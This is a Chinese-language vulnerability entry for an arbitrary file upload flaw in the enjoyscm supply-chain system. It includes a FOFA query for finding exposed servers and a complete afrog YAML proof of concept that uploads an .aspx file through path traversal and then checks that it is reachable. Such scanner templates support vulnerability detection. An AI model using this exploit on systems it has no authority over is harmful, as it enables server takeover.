enjoyscm-uploadfile: enjoyscm UploadFile任意文件上传

漏洞描述

enjoyscm是国内部分超市使用的一种供应链管理系统。enjoyscm UploadFile参数存在任意文件上传漏洞，攻击者通过漏洞可以获取服务器权限。 fofa: title="供应商网上服务厅"

PoC代码[已公开]

id: enjoyscm-uploadfile

info:
  name: enjoyscm UploadFile任意文件上传
  author: zan8in
  severity: high
  verified: true
  description: |-
    enjoyscm是国内部分超市使用的一种供应链管理系统。enjoyscm UploadFile参数存在 任意文件上传漏洞，攻击者通过漏洞可以获取服务器权限。
    fofa: title="供应商网上服务厅"
  tags: enjoyscm,uploadfile
  created: 2024/01/08

set:
  randstr: randomLowercase(5)
  randbody: randomLowercase(28)
  rboundary: randomLowercase(8)
rules:
  r0:
    request:
      method: POST
      path: /File/UploadFile
      headers:
        Content-Type: multipart/form-data; boundary=WebKitFormBoundary{{rboundary}}
      body: "\
        --WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"file\"; filename=\"../../../{{randstr}}.aspx\"\r\n\
        Content-Type: image/jpeg\r\n\
        \r\n\
        hello {{randbody}}\r\n\
        --WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"action\"\r\n\
        \r\n\
        unloadfile\r\n\
        --WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"filepath\"\r\n\
        \r\n\
        \r\n\
        --WebKitFormBoundary{{rboundary}}--\r\n\
        "
    expression: true
  r1:
    request:
      method: GET
      path: /{{randstr}}.aspx
    expression: response.status == 200 && response.body.bcontains(bytes(randbody))
expression: r0() && r1()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/enjoyscm-uploadfile.yaml